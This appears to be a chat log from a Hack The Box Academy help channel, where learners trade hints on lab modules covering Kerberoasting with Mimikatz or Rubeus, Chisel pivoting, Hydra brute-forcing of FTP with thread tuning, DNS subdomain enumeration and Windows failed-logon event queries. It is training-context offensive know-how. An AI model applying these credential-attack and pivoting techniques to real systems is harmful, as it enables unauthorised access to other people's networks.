If you are still stuck, re-read the "Shares" section of the Service Scanning section

Oh. Is it the ||NULL||? or something to that effect?

I'll DM you real quick if that's ok

Sure since I'm lost on context anyway lol

wow... just respect, still helping people here, you earned my respect, and now i sense that you do this because you actually wanna help people, whish we all had one of marcie's trait in us 😄

For anyone that's done the Advanced XSS module. In the Skills Assessment, is the "Deliver to Victim" feature in the exploitserver.htb used?

yeah

Thanks!

I’m trying to follow along with the exercises in the Linux fundamentals module, but it says I’m not in the sudoers file and that I will be reported to the authorities… 🫤

thanks mate i will apreeciate it if u have time to send me the script

gg

Oh… forgot I was ssh into the host machine.
Works on my own pwnbox. 😬

can some one help me with this Broken Authentication/Brute Forcing Passwords

have you found the minimum policy? Then it's just matters of using the one liner in the module with some minor changes to get a list of possible passwords

Another day to remind y’all that I’m stuck, Debug the attached binary to find the flag being pushed to the stack, here I have gotten a lot of flag in the given code but none was correct, pls if you have pass intro to assembly language I need help pls

I disas the binary code analyses the flag and use gpt to convert the hex value of flag being pushed to stack to flag yet none its correct, is try submitting the hex value direct yet im getting incorrect pls i need help if. You have. Done this module, this it’s the final module on my soc analyst p requisite path

for the skills assesment in DFIR module, is there an easy way to analyze the json file for suspicious processes?

the question Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe

In "SOCKS5 Tunneling with Chisel" from "Pivoting, Tunneling, and Port Forwarding" when i compile chisel it uses a newer version of GLIBC, wich is not present on the pivothost. What is a good way to resolve this? I cant update the GLIBC version on the pivothost. Is there a way to build it in an older version?

no i kinda 100% lost here first alot of options are availabe for the policy like it contain everything except all small letters second the limit rate the xforward for ip dont do it

Nothing actually gets reported btw

just got it, its not related to VAD at all lol, try different collection methods 😉

you will have to compile it statically or download an old version of the pre-compiled binary.

Try version 1.74 or downwards

Thanks, that did it for me 🙂 Maybe the machine should be updated

If anyone can educate me more about this module i will appreciate it

It's just fine as it is, considering it's still workable

I am in a computer connected to a domain, I have shown the users to which you can apply a kerberoasting with powerview, the thing is that I do not have the password in clear text of the local administrator user of the computer to which I am connected, this same thing can be done from my Kali machine with GetUserSPNs?

Because I don't have valid credentials for any domain user at the moment.

From my kali I don't have direct communication with the DC, but I have an open tunnel with chisel.

Even indirect communication, it's reaching the DC somehow

Perhaps listening on the network will be more helpful. Something might Respond

Yes, but I wonder if this same thing can be done from my kali machine, since I don't have valid domain credentials for any user, and my machine is not joined to the Domain.

¯_(ツ)_/¯

Without context of the module or section you're doing I have 0 idea what you're referring to

You have a chisel set up, how did you manage that?

ACTIVE DIRECTORY ENUMERATION & ATTACKS -----> AD Enumeration & Attacks - Skills Assessment Part I

You can get domain creds; many tools you can use

Just because it's not a fully interactive shell doesn't mean some tools can't be run

Yes, but I mean, in this case, as I am as nt authority system on a computer attached to the domain, the privilege level I think I remember was the same as being a normal user of the domain, so that's why I could with powerview run the Kerberoasting no?

To kerberoasting from my Kali, I would need credentials of a domain user.

Either way. There's a tool you can use on the Web01 host

Mimikatz or rubeus

They both should work

Though with mimikatz you may need to pass the commands through as mimikatz "command" "exit"

So, this here is correct, right?

That was my question, I'm not sure if this is right or not.

I wouldn't suggest a pivot until after you have creds

Yes, but I mean, that's why I was able to perform kerberoasting, right? because of what I said above.

Perhaps

I'm not entirely sure how it works through the pivot ¯_(ツ)_/¯

Yes and through pivoting.

Okay, of course, since I am on a computer joined to the domain as nt-authority system, I do not need credentials from a domain user, because I am a user with maximum privileges and that is why Kerberoasting can be applied, right?

I'm doing "Using CrackMapExec" with "NetExec" - does anybody know where the modules are stored when installing with pipx?

¯_(ツ)_/¯

But there is official instructions on installing netexec on their wiki and gh iirc

Try to repeat what you learned so far to find more files/directories. One of them should give you a flag. What is the content of the flag?

Yeah, I know, I mean I know where the modules should be, as they are in the /nxc folder in their repo, but can't find them after installing - and I don't find any documentation on it.

birdman

<@&861185840277487616>

Okay sorry

lol

Recursion

Wrong place dude

Where can I apply?

Read the #rules no advertising your company ffs

LOL MY BAD HOMIE

it's 4 am in Thailand

Also you're in probably the worst channel for finding any "professionals"

Not to mention AI = instant L

Don't dm me

Thanks Marcie!

yup

can some one help me with this Broken Authentication/Brute Forcing Passwords

Ok, found it...: ~/.nxc/modules 🙄

I never worried about it bc I never needed to go into the nxc modules folder ¯_(ツ)_/¯

Fair enough - I was just wondering, as they are talking about custom modules in the "Using CrackMapExec" module.

Although I found it, it's empty, lol.

Anyway, thanks.

Probably because it's for use with custom modules and default modules are loaded in a different section

Yeah, I think it's symlinked. 🤔

Is this module even hard or am i trippin

Oh damn, I didn't know it posted itself here, I didn't even remember pressing enter I was searching it here:

It helps of you say what you're struggling with instead of just "can anyone help"

Also repeating the question isn't helpful for getting answers lol

hello, i am on "getting started", under "privilege escalation". i am unable to download LinEnum.sh to my pwnbox using either wget or curl. wget and curl cannot connect to https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Do you mean the target lab?

The target labs don't have internet access

You'll need to first download it on your attack machine, then copy to target

Also generally with gh stuff you wanna do git clone <repo>

For free accounts: there's limited internet access on the in-browser pwnbox

ok, i thought the attack machine is the pwnbox that i can uses for 2hours a day on a free account. what is the target lab

But steps are;
Download to attack box -> run a share service [i.e. python3 http.service module] -> the target

I am struggling with what to do after getting the wordlist how to brute force the password and bypass the rate limit

ok, i guess thats why git clone is also not working

Target lab is the 10.129.x.x or the public_ip:port that spawns after clicking 'click here to spawn target'

Git clone should work

it is not working

Iirc you can access git and some other websites on the in-browser vm [pwnbox]

https://github.com/rebootuser/LinEnum

Would be the github repo

Raw is literally raw code

If all else fails, go to the raw page -> ctrl+A -> ctrl+C -> in pwnbox open a text editor and paste

Then save, and follow the upload steps

Where did I sent it twice X-X

I meant repeating the module question

Ah.

Why I can't use the general off topic channel?

I think verify your account first

.

Read and follow #welcome

So what part exactly do you need help with? the rate limit or the bruteforce bit?

Both

ok now, i am on the nibbles box here - https://app.hackthebox.com/machines/121.

i have spawned the target ip and started the pwnbox but i am getting WARNING: No targets were specified, so 0 hosts scanned. after scanning the target IP with nmap

no targets specified

Means you didn't provide an IP or host to scan

BROKEN AUTHENTICATION | Brute Forcing Passwords is some can help please?

yeah i am stuck here too this is tough one

yeah i am doing it 3 days

if u passed it can you give a hint

am already sorted all passwords

for sure

yeah bro how did you solved this?

SSH to 10.129.204.9 with user "user2" and password ""

whats the password supposed to be dude
i tried just pressing enter

i tried pressing space

whaaa

The previous answer

oh

thank you

This is true for all questions in this section except the first ofc

yeah got it
thanks man

can you help me bro?

He hasn't completed it yet

whats the "ls" command for windows

dir?

yes

though for one of the questions you're best to be in a powershell session; and doing a recursive search. plenty of sources online to figure it out

ye im on user4 question
User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them.

so many flags.txt
how am i gonna check them all

recursion; only one of them has any content in it

Hi everyone, currently I’m at PASSWORD ATTACKS module

Password Mutations

Does it natural for password cracking to get slower and slower ? start from 14:38h to 110:56h

I waited more than one hour

yeah ofc
but not sure how im gonna search through all of them
is there a command for it?

i think i got it

there's a command in the cheatsheet which may be useful

oh thank you

at least to get you started with the powershell, you might need a bit more digging to be able to search for size

i believe -neq is a comparator in powershell for not equal

ill check it out
thanks for the help

sorry it's ne

-ne?

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_comparison_operators?view=powershell-7.4

you can also use -gt for greater than zero

i didnt solve it yet but if u want help with anything else i can

i believe length of an item is Object.Length in powershell

so $_.length in the case of a recursive search with multiple items

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_psitem?view=powershell-7.4

and of course ? (or where-Object)

https://ilovepowershell.com/windows-powershell-legacy/list-of-top-powershell-alias/

here's a list of common and default powershell aliases

as a lot of resources online will use the common aliases for items

i figured it out thanks

np i didn't really help, just put it in a script block so it's easier for others to parse

Get-ChildItem is that not a PS command??

it doesnt recognize it

it is

well its not being recognized for some reason

How long does university enroll take time

are you in cmd?

^

nah
i pressed on the powershell promt through the workstation and
doesnt it autmatically connect you to the PS promt when you connect via your own vm?

if your shell prompt doesn't have PS in front, and you're in a Windows env, you're in CMD

ah

ah i thought i was in PS

format would be PS $CD>

so like PS C:\Users\LOL\>

yeah i get you

Hi. Quick question: If I buy a platinum subscription, do I instantly receive 1000 cubes?

to drop into powershell, just type powershell

looks like im not then
my bad xd

yes as soon as you purchase it

Thank you 🙂 So I dont have to earn the cubes? I just instantly receive them?

correct

Thanks!

then the following month around the same date; if you haven't unsubscribed, you get another 1k cubes

Amazing!

thank you
i was confused because i also pressed on the PS promt through the HTB workstation and the command still wasnt being recognized

PS prompt in the PWNbox (in-browser vm) is not gonna be the same env as the one native to windows

there's a ps prompt in pwnbox?

yes it's next to the bash terminal

oh i see thanks again

yup immediatly

Hi, is here the right place to ask for a little hint for the JerryTok web challenge? Cannot find the challenges discord room 🙂

#challenges you'll need to read and follow #welcome to access it

Oh, okay, thanks

Query on mod: FILE TRANSFERS - Windows File Transfer Methods Q2:

"Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box".

Reading this seems like no RDP prior to the upload of the file yet the methodology from the room requires access to the machine via RDP to the target to download. Is this poorly worded or am I interpreting it incorrectly?

I noticed the mutant list too big and have duplicate inside it, how can I create unique list without any duplicate?

Use the tasklist command to print running processes and then sort them in reverse order by name. The name of the process that begins with "vm" is the flag for this user.

i used
tasklist /svc | sort /R

i find 2 services that start with vm
vmtoolsd.exe (VMTools)
vm3dservice.exe (vm3dservice)

but none of those are correct
not sure what else to do now

oh shit wait wait

yeah nvm still need help

did you try the name?

yeah ive tried
VMTools
vmtoolsd
toolsd
tools
vm3dservice
3dservice

even with .exe

like everything
but its still wrong

the image name

yeah

im going through them again rn
nothing works

im most likely missing something

OH NVM

i thought i tried vmtoolsd.exe but i havent

my bad
thank you xd

Okay I am on Footprinting > DNS. Stuck on the last question. What is the FQDN of the host where the last octet ends with "x.x.x.203"?

I have literally used every list within Seclist and n0kovo_subdomains

My command dnsenum --dnsserver 10.129.229.61 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

Cannot find .203

The hint is Remember that different wordlists do not always have the same entries. which is totally what i have been doing

you may want to use a more fierce wordlist

this is being addressed, just RDP in then upload

I did!! Literally every list, so I am assuming i have to make adjustments to my dnsenum command

also: subdomains of subdomains

one of the already discovered subdomains will hold the key to 203

Okay thank you, i just wanted to make sure i am not being an idiot. I figured i might need to make some adjustments

the final answer will be subd1.subd2.inlanefreight.htb

my personal strategy was: generate a list of subdomains using a dig axfr query against inlanefreight.htb; then do a loop with the subdomains that amounts to something like dnsenum ... $subd.inlanefreight.htb | grep 203 ("..."is the set options)

that way if you have a list and let a computer iterate through it, surely you didn't miss the one subdomain

always the 0 point question which waste lot of time

any hint guys

Module: ATTACKING COMMON APPLICATIONS
Section: WordPress - Discovery & Enumeration
Question: Enumerate the host and find a flag.txt flag in an accessible directory.

i mean... it says it in the name, in an accessible directory - so it'll be in a directory you have access to

i believe error redirects work the same/similar in CMD/Powershell where you can redirect errors to an error.log file

man what do i do here

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.

im not sure what to use

i tried Get-ADUser

but uhh yeah maybe something with that?

what would the filters be and all

are you connected to the domain controller? and two look up how to search event logs

ive found something about filterhashtables

and a weird @{LogName... command

imma try it out

fun fact the @{..} syntax is xml

considering that event logs are generated in xml, that's what it's drawing from

o good to know

LogName = the type of log; Security, Audit, Information, Critical

i thought it was something for me to edit and got hella confused when reading the cheat sheet

ID = the EventID #

4625 is the Security Event ID for logon failures

also the Domain-Controller is the same as the 172.16... one from an earlier question

do i have to ssh to that?

or doesnt matter

How could I create unique list without any duplicate values ?

yes you have to connect to it the same way you did for user7

Its okay to learn just networking hack the box
With with out network + and ccna

sort -u or uniq

oooh makes sense now
lemme try again

if you don't connect to the Domain Controller, you won't get the right answer

im in im in

account for which logon failed

https://academy.hackthebox.com/module/158/section/1438
hello i've got a problem, i don't understand why the port rdp and ssh it's closed whereas i want connect to rdp for find the flag.
I've set up my tunnel using the ptunnel-ng tool ...

user2
ACADEMY-ICL11
S-1-0-0

wrong

hm

the question is asking for the account with the highest count of consecutive logon failures to the DomainController

OH

lemme go through it again

remember: key being there being logged into the DC

logon type is where i look at?

hm alright

oh btw i executed this

Get-WinEvent -MaxEvents 10 -FilterHashTable @{LogName=‘Security’;ID=‘4625’} | fl

don't do -MaxEvents

found it on google

oh nice

what does -MaxEvents do?

I mean.. "max events"

ye stupid question

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/?view=powershell-7.4 this is a good resource for powershell commandlets to reference if you need more info on them

you can search by the cmdlet name and get the full doc info on it

o

Password Attacks Module, Password Mutations Section

Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.

I created the mutation list and have more than hour trying to crack the password, how long should take ?

don't attack ssh

attack one of the other running services

should pop in ~30 minutes

I’m attacking ftp, is there any faster way to?

ssh is an EXTREMELY slow service to brute

using more threads

-t 48 is the most stable; default is 16 for hydra on ftp

I’m using -t 64

64 can also be unstable and completely skip over the password

spoilers

what size is your list (wc -l mutated_passwords.list)

brother just delete it

considering it's an answer

ye xd

94044

ok so it's the right size

ah not enough cubes for the next module

definitely scale back your threads

I have the impression that he wants to connect but he cuts out every time. Does anyone have any idea where this could come from?